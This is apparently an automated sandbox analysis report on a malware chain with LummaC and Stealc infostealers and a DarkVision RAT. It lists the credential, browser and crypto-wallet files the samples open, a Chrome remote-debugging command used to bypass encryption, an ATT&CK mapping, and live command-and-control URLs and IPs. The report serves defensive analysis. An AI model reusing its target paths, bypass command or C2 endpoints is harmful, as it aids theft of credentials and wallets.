Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU

Source: Yara match	File source: Process Memory Space: c92938c010.exe PID: 7172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2bd330404c.exe PID: 1608, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: b5c7128cd0.exe PID: 7568, type: MEMORYSTR

Yara detected DarkVision Rat

Source: Yara match	File source: 40.0.downloaded_file.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.a2df98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.explorer.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe82da4b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.cd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe83582f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe83582f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe82da4b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: c92938c010.exe PID: 7172, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000026.00000003.2750899040.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936414035.0000000000111000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2936545464.0000000000111000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2593857071.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2bd330404c.exe PID: 1608, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0097EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		6_2_0097EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0097DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		6_2_0097DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	21 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	212 Process Injection	22 Software Packing	NTDS	356 System Information Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	961 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	121 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	371 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	371 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	212 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	58%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4ZAAIhb[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4ZAAIhb[1].exe	34%	ReversingLabs	Win32.Exploit.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	45%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	21%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	39%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	34%	ReversingLabs	Win32.Exploit.Generic
C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	39%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	21%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	45%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	53%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	83%	ReversingLabs	Win32.Trojan.Doina

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
woo097878781.win	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://185.215.113.206/68b591d6548ec281/rowser	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/hpser	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/freebl3.dllb_	100%	Avira URL Cloud	malware
http://woo097878781.win	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exez$	100%	Avira URL Cloud	malware
https://atten-supporse.biz/F8l	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dllL	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dllll	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exeu	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/mozglue.dllDataUser	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/vcruntime140.dllvbnData	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php/-	100%	Avira URL Cloud	malware
https://atten-supporse.biz/apiZwQdx	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dlldll	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/rowser	18%	Virustotal		Browse
http://woo097878781.win	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
example.org	93.184.215.14	true	false		high
atten-supporse.biz	104.21.16.9	true	false		high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false		high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false		high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false		high
ipv4only.arpa	192.0.0.171	true	false		high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false		high
woo097878781.win	154.216.20.243	true	true	11%, Virustotal, Browse	unknown
contile.services.mozilla.com	34.117.188.166	true	false		high
youtube.com	142.250.181.78	true	false		high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false		high
spocs.getpocket.com	unknown	unknown	false		high
detectportal.firefox.com	unknown	unknown	false		high
content-signature-2.cdn.mozilla.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
formy-spill.biz	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://atten-supporse.biz/api	false	high
atten-supporse.biz	false	high
dwell-exclaim.biz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mozilla.org/#/properties/bucketConfig/properties/starthttp://mozilla.org/#/properties/outcome	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/proposedEnrollment	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/schemaVersion	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2864089087.0000019CED4D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	false		high
https://json-schema.org/draft/2019-09/schema.	firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 00000022.00000002.2902767464.0000019CFE6D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill	firefox.exe, 00000022.00000002.2922045046.0000019D00AA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dllb_	2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://screenshots.firefox.com	firefox.exe, 00000022.00000002.2876452576.0000019CFAB61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFABE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE50C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF0F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD955000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/startDatehttp://mozi	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/userFacingName	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.firefox.com/	firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/featureIds/items	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/rowser	2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/quickSuggestSponsoredEnabled	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/valuehtt	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mozilla-services/screenshots	firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/hpser	2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: malware	unknown
